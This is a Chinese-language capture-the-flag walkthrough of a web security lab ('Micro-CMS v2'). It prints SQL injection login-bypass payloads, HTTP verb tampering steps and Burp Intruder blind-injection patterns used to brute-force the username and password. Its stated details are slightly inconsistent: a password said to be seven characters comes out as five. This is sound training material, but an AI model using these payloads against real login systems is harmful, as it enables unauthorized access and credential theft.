Micro-CMS v2的題目
FLAG0 [Injection] SQL injection
data:image/s3,"s3://crabby-images/d5feb/d5febe021fa9df98416992a931188fa795b30d9c" alt=""
data:image/s3,"s3://crabby-images/941a6/941a66a72516476c5b7279ce83e15ea6b5bcdfc0" alt=""
Username輸入admin試看看
data:image/s3,"s3://crabby-images/50736/50736c38fd4590a5d71ec455843922e3e66f8d70" alt=""
得到一個未知使用者。
這邊我忽然想到我之前考情報セキュリティマネジメント的時候
有看過這其實是bug,Unknown user代表沒有這個使用者
,那有心人士就會藉著這個漏洞去一一嘗試,直到出現其他錯誤,例如密碼錯誤,
那就可以縮小範圍得知有這格使用者,之後可再用辞書攻撃【Dictionary Attack】或パスワードリスト攻撃之類去破解
data:image/s3,"s3://crabby-images/268a2/268a23bcfdaeedd38936182215063b2b37d0d06a" alt=""
輸入單引號’
data:image/s3,"s3://crabby-images/c4f70/c4f70500da6fccdc4b2733299443ffbf0834bfda" alt=""
可以得到以下畫面
data:image/s3,"s3://crabby-images/4415d/4415d528626a9129396ccda7cd329db22439d500" alt=""
cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')
可以知道這邊是透過 username select 後再用比對密碼
SELECT
password
FROM
admins WHERE
username='<Username>'
弱勢
如果 '<Username>'
這邊假裝我的使用者名是 ''
or
'1'
= '1'
SELECT
password
FROM
admins WHERE
username=''
or
'1'
= '1'
會誤判為 ''
或是'1'
= '1'
都條件成立,所以我試了 '
or
'1'
= '1
data:image/s3,"s3://crabby-images/2d3de/2d3de6629efcc5b61a244743445b3c7331a27c21" alt=""
得到結果
Invalid password,代表使用者存在但密碼錯誤
data:image/s3,"s3://crabby-images/3a086/3a08663632c0916d5f1c4aca066968401f962fcb" alt=""
那之後我們可以在修改成
SELECT
password
FROM
admins WHERE
username='a'
UNION
SELECT
'1'
Username:a'
UNION
SELECT
'1
Password:1
用這樣去試看看
data:image/s3,"s3://crabby-images/255d8/255d80ce80bd4ee42efd5ca2da0672cd54586ceb" alt=""
這樣就可以成功登入
data:image/s3,"s3://crabby-images/c987d/c987d222bd25a1966c5b07d57bf6b234f85fc412" alt=""
多了 一個Private Page點進去看看
data:image/s3,"s3://crabby-images/52fa6/52fa66549546239ed4a43c2c02ee425dc50e4575" alt=""
找到一面旗子拉
FLAG0找到
data:image/s3,"s3://crabby-images/a7f2f/a7f2fc0fe40411704bebf07b58ad8ea8acd186c6" alt=""
FLAG1 HTTP Verb Tampering
參考資料 小朱® 的技術隨手寫
去建立新頁面看看
data:image/s3,"s3://crabby-images/045b0/045b050b900ebbe77557f47f7529587857092e1b" alt=""
data:image/s3,"s3://crabby-images/3e7cf/3e7cf09e877dcacff803539fe54ecdccf04cb84b" alt=""
隨便建立一個頁面
data:image/s3,"s3://crabby-images/21ca9/21ca9d0f85492015e20cdd626fdba73e8b8930d4" alt=""
再點回去編輯那邊看看
data:image/s3,"s3://crabby-images/db8ed/db8ed8111bd0678b00fbb8c28e7d1bcf2b739e53" alt=""
隨便加個東西保存,似乎沒有什麼問題
data:image/s3,"s3://crabby-images/1d712/1d71232e587811184e126af7f08ee2d57c23c01e" alt=""
但若是我什麼都沒有變更卻按保存
data:image/s3,"s3://crabby-images/ddbaf/ddbaff14212da4478cb7ce86ecbccef6b269ff81" alt=""
會跑出下面的NOT FOUNF頁面
data:image/s3,"s3://crabby-images/eccb9/eccb9a95f5afcd7a917dd8a42bc65bd03e03b0f8" alt=""
這時候安裝一個叫做postman的App來查看
選擇POST和輸入NOTFOUND的網址
data:image/s3,"s3://crabby-images/505d9/505d99cbbd52347e72f0ef0fe7800435c44601d8" alt=""
FLAG1找到
data:image/s3,"s3://crabby-images/9808d/9808d1feec326f623d3a566a807359b57b28534b" alt=""
data:image/s3,"s3://crabby-images/337de/337defc0a9ecb66250b02d2e51c9b079edc3d832" alt=""
FLAG2 暴力破解
登出再嘗試登入看看
data:image/s3,"s3://crabby-images/3583f/3583fab285f5821e6630f04762f190c78085b397" alt=""
再順利登入後會進入一個Logged in畫面
但只持續五秒左右畫面就會跳轉到上面那個頁面
data:image/s3,"s3://crabby-images/43a4f/43a4fce777d1797127456e554441c2b0fe4b65bc" alt=""
url http://35.227.24.107/0a5dfb4908/login
為了不讓 js 執行去Burp suite(或是 postman)上看看html的原始碼
這次用
data:image/s3,"s3://crabby-images/75740/757407d4ba597c5eae1cdcc938f7fff8e0024406" alt=""
data:image/s3,"s3://crabby-images/c4a2b/c4a2bf191046a38f639cc42bffac9581a41e3b94" alt=""
按右鍵傳到Repeater 然後把get改成post 後send
data:image/s3,"s3://crabby-images/4c448/4c4484e8e25b9645b543c898c1318d6f6d950020" alt=""
data:image/s3,"s3://crabby-images/b0e80/b0e802cd3f5845381c26c842dc38fb6463ce305b" alt=""
data:image/s3,"s3://crabby-images/4d5b9/4d5b9d2b7cbefefbd593b11bb02a7363cb5c64f4" alt=""
若出現這個錯誤的話再去修改PROXY的設定
data:image/s3,"s3://crabby-images/7919f/7919fd8e3a69d759c9a7a09cb46749b26a7b0736" alt=""
再輸入網址進去看看,這邊要輸入Username和password 我是輸入以下
Username:a'
UNION
SELECT
'1
Password:1
data:image/s3,"s3://crabby-images/6272c/6272cb19e44964831121da56525f02d0cb8f4324" alt=""
data:image/s3,"s3://crabby-images/781c7/781c71c84875dfb4e0fff9eb3aff7cd23c84f9ce" alt=""
會出現以下提示
<!-- You got logged in, congrats! Do you have the real username and password? If not, might want to do that! -->
使用burpsuite的Intruder(入侵者)這個模塊進行暴力破解
有關暴力破解這篇講的不錯 →每日頭條
data:image/s3,"s3://crabby-images/160b7/160b7d131e74c686ef244c6f146021200be9cf30" alt=""
username=’ or LENGTH(username)=§1§&password=pvd
data:image/s3,"s3://crabby-images/5cebc/5cebc7e3f7a4c59607064c4cd40c43e919ca554e" alt=""
data:image/s3,"s3://crabby-images/c574a/c574abdfd087d60062a8044761ae03ee2c20aef1" alt=""
Target 的HOST名記得換一下,從新登出HOST也會換,所以要注意一下
data:image/s3,"s3://crabby-images/ce49d/ce49d9393c4ca73e463772238830c1daccdef2ba" alt=""
左上的Start attack
data:image/s3,"s3://crabby-images/bc494/bc494d630fc5539d5ccd09594f49973c04c00370" alt="這張圖片的 alt 屬性值為空,它的檔案名稱為 image-185.png"
data:image/s3,"s3://crabby-images/55b5d/55b5d7a57322a3d62e5c3aefb00c62127458a5b3" alt=""
加上一個#
username=’ or LENGTH(username)=§1§#&password=pwd
可發現7 是544 其餘都是540
data:image/s3,"s3://crabby-images/f49d1/f49d19e68f8afff298eaf12353747f16b79673a0" alt=""
這邊可以看到除了7的結果外0-10都是未知的使用者,這邊可得知使用者帳號由7個英文數字組成的
data:image/s3,"s3://crabby-images/e0b28/e0b28c74dccc6386294a19a5a1e8688b38120c64" alt=""
data:image/s3,"s3://crabby-images/8c6e5/8c6e54a47d7947904433831956cf60567caf8203" alt=""
接下來測試密碼的部分
username=’ or LENGTH(password)=§1§#&password=
這邊得知 密碼是由7個英文數字組成的
data:image/s3,"s3://crabby-images/2663a/2663a2a9add454a89839b8f3ed7ce3bf640704a2" alt=""
data:image/s3,"s3://crabby-images/5f48e/5f48ea68fa80c06bde9bc335608675637e5c28b9" alt=""
uusername=’ or username Like ‘§§§§§§§§§§§§§_§’#&password=pwd
data:image/s3,"s3://crabby-images/b936f/b936fa4bf9ede8b7b14865bdbe12eb2f696b8689" alt=""
data:image/s3,"s3://crabby-images/37f08/37f087c1436ad6459e04243d4bde74b24742d445" alt=""
這邊可得知帳號第一個是字母 t
帳號第二個是字母 o
data:image/s3,"s3://crabby-images/d8be3/d8be3acaa2ec602541f1f355bd42afc44d94d7e9" alt=""
把得到的數字輸入到第一位和第二位
username=’ or username Like ‘to§§§§§§§§§_§’#&password=pwd
data:image/s3,"s3://crabby-images/53b3f/53b3ff6ec0c66f6f1b9e52a965b8b2196530af2e" alt=""
data:image/s3,"s3://crabby-images/2d152/2d15240c5f7922b31c4c920699dae037a4e14fb4" alt=""
可得知帳號是towanda
慢慢等的話,跑個30分應該一次7個都會出來,但應為排列組合的關係,如果知道2個數或3個數再去查號會比較快
這漫慢等的結果
data:image/s3,"s3://crabby-images/3254c/3254c12ac2cf7972f361716df051e4871114382d" alt=""
接下來找password
username=’ or password Like ‘§§§§§§§§§_§’#&password=pwd
data:image/s3,"s3://crabby-images/5b9fd/5b9fdd80891c0b990a35f84f7748c50dc79d402b" alt=""
千萬不要寫錯行,我16行寫到17行去,結果一直失敗
得到密碼reina
data:image/s3,"s3://crabby-images/989fb/989fbe949f75d90056b74e29c77fbccaa3861359" alt=""
輸入帳密,就會得到旗子啦 FLAG2找到
data:image/s3,"s3://crabby-images/f0dc5/f0dc59f29f5bc83c0cc7f2bed4618425ea0d8623" alt=""
data:image/s3,"s3://crabby-images/f8da9/f8da95a63989781fab98bcd7911994f6581cb1ce" alt=""